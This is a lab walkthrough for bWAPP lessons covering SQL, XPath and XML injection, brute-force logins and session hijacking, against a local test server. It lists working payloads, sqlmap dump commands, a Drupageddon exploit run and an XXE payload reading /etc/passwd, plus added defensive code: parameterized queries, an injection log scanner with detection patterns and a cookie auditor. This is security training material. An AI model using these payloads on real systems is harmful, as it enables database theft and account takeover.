A1 A2

Uploaded by

mohdfahad0080

SQL Injection (GET/Search) - Low Security Level Solution:

Step 1. Give ' as an input and click on the Search button. Note that a MySQL error will be displayed.

Let's use the payloads and test this lesson.

Follow steps as shown in the video:

Payloads:

1' or 1=1#

' union select all 1,2,3,4,5,6,7#

' union select all 1,database(),user(),system_user(),@@version,6,7#

0' union select all 1, concat(id,login),password,email,secret,6,7 from users #;

* You can click on the Search button two times and the results will be displayed.

* Test this lesson with other payloads.

Not covered in this lesson, but:

* You can pass the payloads through the URL.

* You can load all the payloads into BurpSuite, automate the process and check the results.

SQL Injection (GET/Select) - Low Security Level Solution:
Step 1. Click on go and check the url
Step 2. Insert ' as shown in the video and click enter and check the MYSQL error
Step 3. Use the below payloads and follow steps as shown in the video:
Payloads:
0 union select all 1,2,3,4,5,6,7 #
0 union select all 1,database(),user(),system_user(),@@version,6,7
0 union select all 1, concat(id,login),password,email,secret,6,7 from users #
0 union select all 1, concat(id,login),password,email,secret,6,7 from users limit 1,1#
* Explore the lesson with other Payloads.
SQL Injection (POST/Search) - Low Security Level

Solution:

*Note: I am using BurpSuite's pre-configured browser. If you are not using the pre-configured browser, please configure your browser with the proxy and then follow the below steps.

Step 1. On the lesson page, click on Search button

Step 2. Go to BurpSuite and add the below payload as shown in the video:

Payload - 0' union select all 1, concat(id,login),password,email,secret,6,7 from users #

Forward the request.

* Explore the lesson with other payloads


SQL Injection (POST/Select) - Low Security Level

Solution:

*Note: I am using BurpSuite's pre-configured browser. If you are not using the pre-configured browser, please configure your browser with the proxy and then follow the below steps.

Step 1. Click on Go.

Step 2. Go to BurpSuite remove 1 (For more details check the video).

Step 3. Add below payload

Payload:

0 union select all 1, concat(id,login),password,email,secret,6,7 from users #

Step 4. Forward the request.

Step 5. Go to the lesson page and check the results.

* Explore the lesson with other payloads.


SQL Injection (AJAX/JSON/jQuery) - Low Security Level

Solution:

Step 1. Give any letter as an input in the lesson text box and check the output. Note that when you give a letter as an input, results are displayed.

Step 2. Give the below payloads as an input and check the results:

Payloads:

'-- # (the full list of movies is displayed)

'order by 1-- #

'order by 2-- #

' union select 1,version(),3,4,database(),6,7 -- #

Note: Not covered in this video:

* Explore the lesson with other payloads.

* For more understanding of the lesson, it is recommended to look at the source code.

* Use BurpSuite to intercept the request and test your inputs for correct results.
SQL Injection Captcha - Manual Intervention Required! - Low Security Level

Solution:

Step 1. Click on here and check if any changes are observed - No changes seen.

Step 2. Click on Reload button and check if any visible changes are seen - Captcha changes

Step 3. Let's give the Captcha as an input and click on Proceed. A new page is loaded. Notice the URL has changed.
Lesson page URL - http://10.0.2.4/bWAPP/manual_interv.php
URL after giving the Captcha - http://10.0.2.4/bWAPP/sqli_9.php

Step 4. Give ' as an input and click on Search button. Check the Error.

Step 5. Use the below mentioned payload in the text box and click on Search button.

Payload:

'or'1'='1

0' union select all 1, concat(id,login),password,email,secret,6,7 from users #;

* Explore lesson with other payloads.


SQL Injection (Login Form Hero) - Low Security Level

Solution:

Step 1. Give ' as an input, click on Login and check the output.

Step 2. Use below payloads and check the output.

Payloads:

' or 1=1#

' union select all 1,2,3,4 #

neo ' or 'a'='a

* Explore the lesson with other payloads.


SQL Injection (Login Form/User) - Low Security Level

Solution:

*Note: I am using BurpSuite's pre-configured browser. If you are not using the pre-configured browser, please configure your browser with the proxy and then follow the below steps.

Step 1. Give ' as an input in Login text field, click on Login button and check the output.

Step 2. Turn on the intercept. Give bee and bug as an input in Login and Password text field, click on
Login button and check the request in BurpSuite. Note the Cookie and PHPSESSID details
Cookie: security_level=0; PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2

Step 3. Let's create the payloads - follow the steps as shown in the video:

Syntax:

sqlmap -u "YOUR URL" --cookie="security_level=0; PHPSESSID=YOUR SESSION ID" --data "login=bee&password=bug&form=submit" --dbs

Payload 1:

sqlmap -u "http://10.0.2.4/bWAPP/sqli_16.php" --cookie="security_level=0; PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2" --data "login=bee&password=bug&form=submit" --dbs

The payloads below are created with the same logic.

Payload 2:

sqlmap -u "http://10.0.2.4/bWAPP/sqli_16.php" --cookie="security_level=0; PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2" --data "login=bee&password=bug&form=submit" -D bWAPP --tables

Payload 3:

sqlmap -u "http://10.0.2.4/bWAPP/sqli_16.php" --cookie="security_level=0; PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2" --data "login=bee&password=bug&form=submit" -D bWAPP -T users --columns

Payload 4:

sqlmap -u "http://10.0.2.4/bWAPP/sqli_16.php" --cookie="security_level=0; PHPSESSID=bf8c882d2a58c90e2b4cd900e45fd2f2" --data "login=bee&password=bug&form=submit" -D bWAPP -T users -C login,password,secret --dump

Step 4. Open command prompt, paste the newly created payload in the command window and
check the results.
SQL Injection (SQLite) Low Security Level

Solution:

Step 1. Give ' as an input in the text box and click on Search. Check the output.

Step 2. Use the below Payload to check the output.

Payloads:

' or 1=1 --

0' union select all 1,2,3,4,5,6 --

0' union select all 1,sql,3,4,5,6 from sqlite_master where tbl_name='users' --

* Explore the lesson with other payloads
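
Added example (not part of the original walkthrough and not bWAPP's own code): why the SQLite lesson reacts to ' and to ' or 1=1 --, and how a parameterized query treats the same inputs as plain text. The table layout, the sample rows and the shape of the vulnerable query are assumptions constructed for this demo.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the lesson database (assumed schema)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT, release_year TEXT,
                             genre TEXT, main_character TEXT, tickets INTEGER);
        CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT);
        INSERT INTO movies VALUES (1, 'Iron Man', '2008', 'action', 'Tony Stark', 53);
        INSERT INTO movies VALUES (2, 'Man of Steel', '2013', 'action', 'Clark Kent', 78);
        INSERT INTO movies VALUES (3, 'The Matrix', '1999', 'sci-fi', 'Neo', 100);
        INSERT INTO users VALUES (1, 'demo', 'constructed-hash');
    """)
    return db


def search_vulnerable(db, title):
    # Assumed shape of the flaw: the input is pasted into the SQL text, so a
    # quote in the input ends the string literal and the rest is parsed as SQL.
    sql = "SELECT * FROM movies WHERE title LIKE '%" + title + "%'"
    return db.execute(sql).fetchall()


def search_parameterized(db, title):
    # The input is bound as a value; it can never change the statement's shape.
    # LIKE wildcards typed by the user are escaped so they match literally.
    escaped = title.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT * FROM movies WHERE title LIKE ? ESCAPE '\\'"
    return db.execute(sql, ("%" + escaped + "%",)).fetchall()


def outcome(search, db, title):
    """Summarise one search as 'error: ...' or 'N row(s)'."""
    try:
        return "%d row(s)" % len(search(db, title))
    except sqlite3.Error as exc:
        return "error: %s" % exc


# Inputs taken from the lesson above, plus one ordinary search term.
INPUTS = ["Iron", "'", "' or 1=1 --", "0' union select all 1,2,3,4,5,6 --"]

if __name__ == "__main__":
    db = build_db()
    for text in INPUTS:
        print("%-40r concatenated: %-45s bound: %s" % (
            text,
            outcome(search_vulnerable, db, text),
            outcome(search_parameterized, db, text)))
```

With the bound parameter, every lesson input returns zero rows and no SQL error, because the quote never reaches the SQL parser as syntax.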


Drupal SQL Injection (Drupageddon) - Low Security Level

Solution:

Step 1. Click on Drupal and CVE-2014-3704

When you click on Drupal - Welcome to Drupageddon page will be displayed

When you click on CVE-2014-3704 - The page will give you details about the vulnerability.

Step 2. On CVE-2014-3704 page go to EXPLOIT-DB:34992

- Click on the url

- A new window will pop up

- As shown in the video - Click on Exploit - Download - Save File - OK

Step 3. Use below commands

Open your command prompt, go to the folder where you have downloaded the file and run the commands:

- python 34992.py -h

- python 34992.py --target=http://10.0.2.4/drupal/ --username=PseudoTime --pwd=PseudoTime

** You can give username and pwd of your choice

- Check the output

Step 4. Go to the Drupal page and login with your username & password
SQL Injection - Stored (Blog) - Low Security Level

Solution:

Step 1. Use below Payloads to test the lesson

Payloads:

Note: You can modify the prefix of the payload to any name or keep it blank as shown in the video.
PseudoTime',(select @@version)) #

PseudoTime',(select table_name from information_schema.tables limit 0,1)) #

PseudoTime',(select concat(id,login,password) from users limit 0,1)) #

* Test the lesson with different payloads.


SQL Injection - Stored (SQLite) - Low Security Level

Solution:

Step 1. Enter ' and click on Add entry. Check the output - The entry was added to our blog!

Note: No changes are displayed anywhere on the page.

Let's test the lesson with '' as an entry and check the results - now the entries are displayed. Check the output: instead of '', only ' is displayed.

Step 2. Use the below payloads to test the lesson - Click on Add Entry once the payloads are given as
an input.

Note: You can modify the prefix of the payload to any name or keep it blank as shown in the video.
Payloads:

PseudoTime',(select sqlite_version())) --

',(select tbl_name from sqlite_master limit 1,1))--

',(select sql from sqlite_master where tbl_name='users'))--

',(select id from users limit 0,1))--

',(select login from users limit 0,1))--

',(select password from users limit 0,1))--

* Note when you click on Delete Entries all your entries will be deleted.

* Explore the lesson with other payloads.


SQL Injection - Stored (User-Agent) - Low Security Level

Solution:

*Note: I am using BurpSuite's pre-configured browser. If you are not using the pre-configured browser, please configure your browser with the proxy and then follow the below steps.

Step 1. Choose the lesson bug (as shown in the video) and click on Hack button.

Step 2. Go to BurpSuite and you will see POST /bWAPP/sqli_17.php HTTP/1.1

Check the User-Agent:

Click on Forward

Step 3. You will be taken to GET /bWAPP/sqli_17.php HTTP/1.1

Find User-Agent: and remove all the text in front of it

Add the payload in front of User-Agent:

PseudoTime',(select concat(id,login,password) from users limit 0,1)) #

Step 4. Turn intercept to off and go to the lesson page and check the results.
SQL Injection - Stored (XML) - Low Security Level

Solution:

*Note: I am using BurpSuite's pre-configured browser. If you are not using the pre-configured browser, please configure your browser with the proxy and then follow the below steps.

Step 1. Click on Any bugs? button and intercept the request through BurpSuite.

Step 2. Right click and send the request to the Repeater Tab

Step 3. Click on Send and check the Response

Step 4. Add ' as shown in the video, click on Send and check the response. Check the error, and/or click on Render and the output will be displayed.

Step 5. Add the payload +(select 0 from users)+ as shown in the video, click on Send and check the output.

Step 6. You can test the same lesson with another payload. Follow the steps as shown in the video:
a. Click on Proxy
b. Right click and send the request to the Repeater page
c. Remove the highlighted text as shown in the video and add the below payload

Payload:
* Note: As angle brackets aren't allowed in the YouTube description, they are replaced with ( ); kindly roll back ( ) to angle brackets.

(?xml version="1.0" encoding="UTF-8" ?)
(!DOCTYPE copyright [(!ENTITY test SYSTEM "file:///etc//passwd")])
(rest)
(login)&test;(/login)
(secret)login(/secret)
(/rest)

d. Click on Send button.

* Explore lesson with other payloads


SQL Injection - Blind - Boolean-Based

Solution:

Step 1. Give input ' and click on Search button. Check the output.

Step 2. Use the below payload and check the output.

Payloads:

'or 1=1#

' or 1=1 and database()='bWAPP' #

' or 1=1 and substring(database(),1,1)='b' #

*Explore the lesson with other payloads.


SQL Injection - Blind - Time-Based - Low Security Level

Solution:

*Note: I am using BurpSuite's pre-configured browser. If you are not using the pre-configured browser, please configure your browser with the proxy and then follow the below steps.

Step 1. Click on search button and observe how quickly the page is loaded. Now give below payload
as input and notice there is time delay before the page is loaded.

Payload -
' or 1=1 and sleep(1) #
* If you want you can check the time delay with other payloads.
** Note other time delay payloads are not covered in this video.

Step 2. Turn on the proxy in BurpSuite.


In the bwapp lesson page click on Search button and the request will pass through BurpSuite. Note
the Cookie and PHPSESSID details
Cookie: security_level=0; PHPSESSID=

Step 3. Let's create the payloads

Payloads Syntax:

sqlmap -u "Your lesson url" --cookie="security_level=0;PHPSESSID=" -p title --threads=5 --level=5 --risk=3 --batch --dbs

-u : url to scan

-p : Parameter to scan

title : Compares responses based on page title

threads: Allows the user to define the number of concurrent requests sent by the SQLMap tool. This reduces overall testing time. It should not be set to a high value, as that may impact the accuracy of the result.

Risk & Level: Risk sets the type of payloads used by the tool. By default, it uses value 1 and can be configured up to level 3. Level 3, being the maximum, includes some heavy SQL queries.

The level defines the number of checks/payloads to be performed. The value ranges from 1 to 5. 5, being the maximum, includes a large number of payloads in the scan.

It is recommended to increase the risk and level if SQLMap is not able to detect the injection with the default settings.

batch: Never ask for user input, use the default behavior

dbs : This option is used to enumerate the database

Follow the same logic for the other payloads:

sqlmap -u "http://10.0.2.4/bWAPP/sqli_15.php?title=&action=search" --cookie="security_level=0;PHPSESSID=" -p title --threads=5 --level=5 --risk=3 --batch --dbs

sqlmap -u "http://10.0.2.4/bWAPP/sqli_15.php?title=&action=search" --cookie="security_level=0;PHPSESSID=" -p title --threads=5 --level=5 --risk=3 --batch -D "bWAPP" --tables

sqlmap -u "http://10.0.2.4/bWAPP/sqli_15.php?title=&action=search" --cookie="security_level=0;PHPSESSID=" -p title --threads=5 --level=5 --risk=3 --batch -T "heroes" --columns

Step 4. Open command prompt, paste the newly created payload in the command window and
check the results.
SQL Injection - Blind (SQLite) - Low Security Level

Solution:

Step 1. In the bWAPP lesson page give ' as an input and click on search.

Step 2. Use sql payload as an input 'or 1=1-- and check the output. From this we can conclude that
the lesson is vulnerable with SQL Injection.

Step 3. Other way to test the lesson is by using below payload


Click on Search
Add the below payload as shown in the video
'union+select+1,2,sql,4,5,6 from sqlite_master--+-

Step 4. Let's exploit the lesson with sqlmap. For capturing the session ID I am using BurpSuite; you can use the application of your choice.

*Note: I am using BurpSuite's pre-configured browser. If you are not using the pre-configured browser, please configure your browser with the proxy and then follow the below steps.

Turn on the proxy in BurpSuite.


In the bWAPP lesson page click on Search button and the request will pass through BurpSuite.
Note the Cookie and PHPSESSID details
Cookie: security_level=0; PHPSESSID=fc6ec097759412111b326b82f14339e3

Step 5. Modify the below payload with your system's details:

sqlmap -u "http://10.0.2.4/bWAPP/sqli_14.php?title=&action=search" --cookie="security_level=0;PHPSESSID=fc6ec097759412111b326b82f14339e3" -p title --dbms=sqlite --threads=5 --level=5 --risk=3 --hex --dbs --tables

Step 6. Open command prompt, paste the newly created payload in the command window and
check the results.

*Give inputs wherever required, in case it asks while you are executing the payload.
** Test the lesson with other payloads.
SQL Injection - Blind (WS/SOAP - Simple Object Access Protocol) Low Security Level

Solution:

Step 1. Select a movie and click on Go and check the output. Perform the same step with other
movie name. The ticket number changes.

Step 2. Select a movie again of your choice click on go and in the url next to movie name add the sql
payload ' or 1=1 (please refer to the video for more details) and check the output.
Note: Ticket number details are missing.

Step 3. Replace the earlier payload and add a new sql payload ' or '1' = '1 (as shown in the video) and
check the output.
Note: Now the ticket numbers are visible once again, but there are more of them than the actual count.

Step 4. Reload the lesson select movie name of your choice and click on go.
Give below payload as an input and check the output
' or length(database())=4 and '1'='1 - Same ticket numbers
Reload the lesson and click on go. Add the below payload as shown in the video.
' or length(database())=5 and '1'='1 - Ticket numbers have changed
From this we can conclude that the length of database name is 5 characters.

Step 5. We can test the lesson with sqlmap as well, copy paste the below payload in Command
Prompt. Note: Directly showing the results to save time.
Change the url IP and PHPSESSID as per your system details.
Payload:

sqlmap -u "http://10.0.2.4/bWAPP/sqli_5.php?title=Man+of+Steel&action=go" --cookie="security_level=0;PHPSESSID=fc6ec097759412111b326b82f14339e3" -p title --threads=5 --level=5 --risk=3 --batch -D bWAPP --tables

* Explore the lesson with other payloads.
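
Added example (not part of the original walkthrough): what the inputs used in the SQL injection lessons above look like from the defender's side, as a small scanner over web server access logs. The log lines are constructed samples in combined log format, the rule names are hypothetical, and the sqlmap version string in the sample is made up.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined log format: ip - - [time] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# One rule per input family used in the lessons (rule names are hypothetical).
RULES = [
    ("boolean-tautology", re.compile(r"'\s*or\s*'?\w+'?\s*=\s*'?\w+", re.I)),
    ("union-select", re.compile(r"\bunion\s+select\b", re.I)),
    ("order-by-probe", re.compile(r"'\s*order\s+by\s+\d+", re.I)),
    ("time-delay", re.compile(r"\bsleep\s*\(", re.I)),
    ("schema-enumeration", re.compile(r"\b(?:information_schema|sqlite_master)\b", re.I)),
    ("fingerprint-function", re.compile(
        r"@@version|\b(?:database|system_user|user|version|sqlite_version)\s*\(", re.I)),
    ("subquery-in-value", re.compile(r"\(\s*select\b", re.I)),
]

# The client controls this header, so it is only a cheap first signal.
SCANNER_UA = re.compile(r"\bsqlmap/", re.I)

# Constructed sample lines; only GET parameters and headers reach an access log,
# so the POST lessons would need request-body logging or a WAF to be visible.
SAMPLE_LOG = r'''
10.0.2.15 - - [01/Jan/2024:10:00:00 +0000] "GET /bWAPP/sqli_15.php?title=iron&action=search HTTP/1.1" 200 1534 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.2.15 - - [01/Jan/2024:10:00:05 +0000] "GET /bWAPP/sqli_14.php?title=%27union+select+1%2C2%2Csql%2C4%2C5%2C6+from+sqlite_master--+-&action=search HTTP/1.1" 200 2210 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.2.15 - - [01/Jan/2024:10:00:09 +0000] "GET /bWAPP/sqli_15.php?title=%27+or+1%3D1+and+sleep%281%29+%23&action=search HTTP/1.1" 200 1534 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.2.15 - - [01/Jan/2024:10:00:12 +0000] "GET /bWAPP/sqli_15.php?title=a&action=search HTTP/1.1" 200 1534 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
10.0.2.15 - - [01/Jan/2024:10:00:20 +0000] "GET /bWAPP/sqli_17.php HTTP/1.1" 200 1800 "-" "PseudoTime',(select concat(id,login,password) from users limit 0,1)) #"
'''.strip().splitlines()


def classify(line):
    """Return the sorted rule names that fire for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    # parse_qsl URL-decodes values, so %27 and + are matched as ' and space.
    query = urlsplit(m.group("target")).query
    fields = [value for _, value in parse_qsl(query, keep_blank_values=True)]
    fields.append(m.group("ua"))  # the User-Agent lesson stores this header
    hits = {name for name, rx in RULES for field in fields if rx.search(field)}
    if SCANNER_UA.search(m.group("ua")):
        hits.add("scanner-user-agent")
    return sorted(hits)


def scan(lines):
    """Map 1-based line number -> rule names, for lines with at least one hit."""
    results = {}
    for number, line in enumerate(lines, start=1):
        hits = classify(line)
        if hits:
            results[number] = hits
    return results


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG).items():
        print("line %d: %s" % (number, ", ".join(hits)))
```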


XML/XPath Injection (Login Form)

Solution:

Step 1. Enter ' in the login text box and click on the Login button and check the results.
(Please follow video for more details).
Error: Warning: SimpleXMLElement::xpath(): Invalid predicate in /var/www/html/bWAPP/xmli_1.php on line 78
You can go through the entire code.
We will try to log in with the credentials neo and trinity.
Let's do white box testing.
Login successful.
You can also test the lesson with logically true statements as below.

Step 2. Enter the below code in the login text box:

PseudoTime'or 1=1 or '1'='1
* Instead of PseudoTime you can use your own name, or you can simply ignore the prefix.

Step 3. You can keep the password blank or give password of your choice.
We will check with both the conditions:
1. Without password
2. With password (You can enter any value of your choice).

* You can test the lesson with other logically true statements.
XML/XPath Injection (Search)

Solution:

Step 1. Click on the Search button and check the resulting URL.
Click on the movie-by-genre drop-down box, click on the Search button and check the result. Note: As we change the genre value in the drop-down box, the URL changes. Let's try exploiting the genre field value.

Step 2. Give ' as an input as shown in the video

Step 3. Note the warning

Step 4. Let's go through the white box testing approach. Open the code and check line no. 158.

This injection is more of a blind XML/XPath injection.

Let's use the below payload.

Payload: ')]/child::node() | PseudoTime[contains(PseudoTime,'

* You can replace the PseudoTime value with any other name. Check the results.

A2 - BROKEN AUTHENTICATION AND SESSION MANAGEMENT

Broken Auth. - CAPTCHA Bypassing - Low Security Level

Solution:

*Note: I am using BurpSuite's pre-configured browser. If you are not using the pre-configured browser, please configure your browser with the proxy and then follow the below steps.

Step 1. Complete the Login, Password and Captcha fields and click on Login.

Step 2. Go to BurpSuite, right click and send the request to the Intruder page.

Step 3. Click on Positions, then click on the Clear button as shown in the video and change the attack type to Cluster bomb.

Step 4. In the Positions tab select bug and click on Add, then select bee and click on Add.

Step 5. Click on Payloads - select Payload set 1 and Payload type as Simple list; in Add text add the values bee, admin, 1234 (for real-life testing scenarios you can copy and paste a list of your choice). Now select Payload set 2 and keep the Payload type as Simple list; in Add text add the values bug, test, password and any other values of your choice. (Note: more values will take more time to execute the attack due to the large number of combinations tested.)

Step 6. Click on Options and go to Grep Match. Click on the check box - Flag result items with responses matching these expressions. Click on Clear and Yes, and add your comment here.
Match type - Simple String
Click on Exclude HTTP Headers

Step 7. Go to Positions and click on Start attack.

Step 8. Click ok, if BurpSuite gives a pop up.

Step 9. Click on length and check results for bee and bug.

Click on Response and search for word successful login

Click on Render and see the successful login page


Broken Auth. - Forgotten Function - Low Security Level

Solution:

Step 1. Click on create user and complete the details

Note: (Email details I have captured is fake).

Step 2. Once the user is created, come back to lesson and give the email id and check the results on
the lesson page.
Broken Auth. - Insecure Login Forms

Solution:

Step 1. Right click and click on View Page Source

Login – tonystark

Password - I am Iron Man


Broken Auth. - Logout Management

Solution:

Step 1. Click on the word here - a pop up will be displayed - Are you sure - Click on OK.

Step 2. Click on the back arrow as shown in the video. You will be taken back to the lesson.
Broken Auth. - Password Attacks

Solution:

*Note: I am using BurpSuite's pre-configured browser. If you are not using the pre-configured browser, please configure your browser with the proxy and then follow the below steps.

Step 1. Enter the login name bee and give incorrect password and click on Login.

Step 2. Go to BurpSuite, right click and send the request to the Intruder page.

Step 3. Click on Positions and then click on clear button as shown in the video and change the attack
type to sniper.

Step 4. In Position tab select wrongpassword and click on add

Step 5. Click on Payloads - Payloads set 1, Payload type - Brute forcer (To save time I am limiting the
field search to 3 alphabets only)

Step 6. Click on Options and go to Grep Match. Click on the check box - Flag result items with responses matching these expressions. Click on Clear and Yes, and add your comment here:
Invalid credentials! Did you forgot your password? - You can get this comment by following the steps as shown in the video
Match type - Simple String
Click on Exclude HTTP Headers

Step 7. Start the attack. If a pop up comes click ok.

Step 8. Click on length and check the results. Click on Response and search for word successful login
Click on Render and see the successful login page

Also, you can solve this lesson with other attacks. (Explore the same - I have not covered in this
lesson).
Broken Auth. - Weak Passwords Low Security Level

Solution:

Step 1. We are going to go through white box testing approach to find the username and password:
Go the source code, follow steps as shown in the video.

Step 2. You can also try solving the lesson with the help of:

1. Sniper attack - Payload Brute Force. E.g. Broken Auth Password Attacks Low S...

2. Cluster Bomb - Payload Simple List. E.g. Broken Auth CAPTCHA Bypassing Low ...

* Note - (Not covered in this video).

However, if you want to see how the above-mentioned attacks work, please check the below recommended videos:

a. Broken Auth. - CAPTCHA Bypassing - Low Security Level

b. Broken Auth. - Password Attacks

Links for both the lessons are shared in the Description.

Try to exploit the lesson with the above 2 mentioned attacks.


Session Mgmt. - Administrative Portals

Solution:

*Note: I am using BurpSuite's pre-configured browser. If you are not using the pre-configured browser, please configure your browser with the proxy and then follow the below steps.

Step 1. Refresh/Reload the lesson page

Step 2. Go to BurpSuite and find -

GET /bWAPP/smgmt_admin_portal.php?admin=0 HTTP/1.1

Change the 0 to 1 and forward the request.
Check the results on the lesson page.

Also, if you don't want to use BurpSuite, simply make the change in the URL directly.
Turning the proxy off and resetting the lesson for a quick demo.
Session Mgmt. - Cookies (HTTPOnly) - Low Security Level

Solution:

This lesson performs Server-Side Includes (SSI) Injection attack to obtain the cookie value. For more
details check out the bWAPP lesson video: • Server Side Includes SSI Injection Lo...

Pre-requisite - In this lesson you will need to use 2 users.


You can create the 2nd user by completing details on Create User tab.
(*As I have already created a user - I am skipping this step)
The 1st user will be - uname - bee pwd –bug

*Note: I am using BurpSuite's pre-configured browser. If you are not using the pre-configured browser, please configure your browser with the proxy and then follow the below steps.

Step 1. Go to the lesson page with your 2nd username in my case PseudoTime.
Click on Cookies button and pass the request through BurpSuite, note the
PHPSESSID - voatd3av85dd8m4mcjcdv49aug
* Your PHPSESSID will be different.

Step 2. Open another browser and login with bee bug user credentials,
go to the lesson page and note the PHPSESSID - 2eqitnakftuvgdjcrts6gnkn68
Follow steps as shown in the video.

Step 3. Go to BurpSuite and change PseudoTime cookie information with bee bug
cookie information and click on Intercept is On it will change to Intercept is Off and visit the lesson
page. Note - PseudoTime login has been replaced with bee login.
Session Mgmt. - Cookies (Secure) - Low Security Level

Solution:

Pre-requisite - In this lesson you will need to use 2 user accounts.


You can create the 2nd user account by completing details on Create User tab.
(*As I have already created a user - I am skipping this step)
The 1st user account will be - uname - bee pwd -bug

*Note: I am using BurpSuite's pre-configured browser. If you are not using the pre-configured browser, please configure your browser with the proxy and then follow the below steps.

The steps for this lesson are more or less similar to the earlier lesson Session Mgmt. - Cookies (HTTPOnly) - Low Security Level. For more details you can visit the lesson page; details are mentioned in the description.

• Session Mgmt Cookies HTTPOnly Low ...

**You can right click on the lesson page, select Inspect - Application - Cookies - http:// local and check the Secure column. It is blank, which confirms that this lesson's cookies are not set to Secure.

Step 1. Go to the lesson page with your 2nd username in my case PseudoTime.
Click on Cookies button and pass the request through BurpSuite, note the
PHPSESSID - 2c8et2m7k2v2mnugr62fo0o6ua
* Your PHPSESSID will be different.

Step 2. Open another browser and login with bee bug user credentials,
go to the lesson page and note the PHPSESSID - ku03lmivhsa3v1g07dblu699e5
Follow steps as shown in the video.

Step 3. Go to BurpSuite and change PseudoTime cookie information with bee bug cookie
information and click on Intercept is On it will change to Intercept is Off and visit the lesson page.
Note - PseudoTime login has been replaced with bee login.
Session Mgmt. - Session ID in URL - Low Security Level

Solution:

Pre-requisite - In this lesson you will need to use 2 users.


You can create the 2nd user by completing details on Create User tab.
(*As I have already created a user - I am skipping this step)
The 1st user will be - uname - bee pwd -bug

*Note: I am using BurpSuite's pre-configured browser. If you are not using the pre-configured browser, please configure your browser with the proxy and then follow the below steps.

Step 1. Observe the url, you can see the PHPSESSID details. Right click and click on Reload, let the
request pass through the BurpSuite.
PseudoTime PHPSESSID - e3t1d57e3udpu2v5ei9mddn2c7
* Note your PHPSESSID will be different

Step 2. Follow steps as shown in the video.


Open another browser and login with bee bug user credentials,
go to the lesson page and note the PHPSESSID - in url.
Bee PHPSESSID - mojtcpvt6sfv89bauhqed7fq90

Step 3. Go to BurpSuite and replace the PseudoTime (your 2nd user) PHPSESSID details with the bee/bug PHPSESSID details as shown in the video. Forward the request and visit the login page where you have logged in with PseudoTime (your 2nd user); you will see PseudoTime (your 2nd user) has been replaced with bee.

** This lesson can be solved in more than 1 way - Research and explore the different ways.
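
Added example (not part of the original walkthrough): a check for the weaknesses that the Cookies (HTTPOnly), Cookies (Secure) and Session ID in URL lessons rely on, run over a response's URL and Set-Cookie headers. The URLs, cookie values and finding names are constructed for the demo; only the cookie names PHPSESSID and security_level come from the lessons.

```python
from urllib.parse import urlsplit, parse_qs

SESSION_COOKIES = {"PHPSESSID"}  # cookie names that carry the session ID


def parse_set_cookie(value):
    """Split one Set-Cookie header value into (name, value, attributes)."""
    parts = [p.strip() for p in value.split(";")]
    name, _, cookie_value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()  # flags map to ""
    return name.strip(), cookie_value, attrs


def audit(url, set_cookie_headers):
    """Return finding names (hypothetical labels) for one HTTP response."""
    findings = []
    parts = urlsplit(url)
    # Session ID in URL: it ends up in browser history, logs and Referer headers.
    if SESSION_COOKIES & set(parse_qs(parts.query)):
        findings.append("session-id-in-url")
    for header in set_cookie_headers:
        name, _, attrs = parse_set_cookie(header)
        if name not in SESSION_COOKIES:
            continue
        if "httponly" not in attrs:  # cookie readable from page scripts
            findings.append("missing-httponly")
        if "secure" not in attrs:    # cookie also sent over plain HTTP
            findings.append("missing-secure")
        if parts.scheme != "https":  # session issued on an unencrypted page
            findings.append("plaintext-transport")
    return findings


# Constructed responses: the lesson-style weak setup and a hardened one.
WEAK = ("http://lab.example/lesson.php?PHPSESSID=constructed-id",
        ["PHPSESSID=constructed-id; path=/", "security_level=0; path=/"])
HARDENED = ("https://lab.example/lesson.php",
            ["PHPSESSID=constructed-id; Path=/; Secure; HttpOnly"])

if __name__ == "__main__":
    print("weak:    ", audit(*WEAK))
    print("hardened:", audit(*HARDENED))
```

In PHP the corresponding settings are session.cookie_httponly, session.cookie_secure and session.use_only_cookies.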
Session Mgmt. - Strong Sessions - Low Security Level

Solution:

Pre-requisite - In this lesson you will need to use 2 users.


You can create the 2nd user by completing details on Create User tab.
(*As I have already created a user - I am skipping this step)
The 1st user will be - uname - bee pwd -bug

*Note: I am using BurpSuite's pre-configured browser. If you are not using the pre-configured browser, please configure your browser with the proxy and then follow the below steps.

Step 1. Go to the lesson page and click on Cookie and note the PHPSESSID - details.

Step 2. Click on here and see the new browser tab it will display the below results: Welcome
PseudoTime, You have a valid session but not a strong session!

Step 3. Go to BurpSuite and Turn on the Intercept.

Step 4. Go to the lesson page and click on here and check the details in BurpSuite.

Step 5. Follow steps as shown in the video - open new browser and login as bee bug and go to the
lesson. Copy the Bee PHPSESSID and replace the PseudoTime PHPSESSID with Bee PHPSESSID.
Bee PHPSESSID - sa6g7o8n974ajqopa03m2l94or
PseudoTime PHPSESSID - e3t1d57e3udpu2v5ei9mddn2c7
Follow steps as shown in the video

Step 6. Check the result - Welcome PseudoTime has been changed to Welcome Bee.
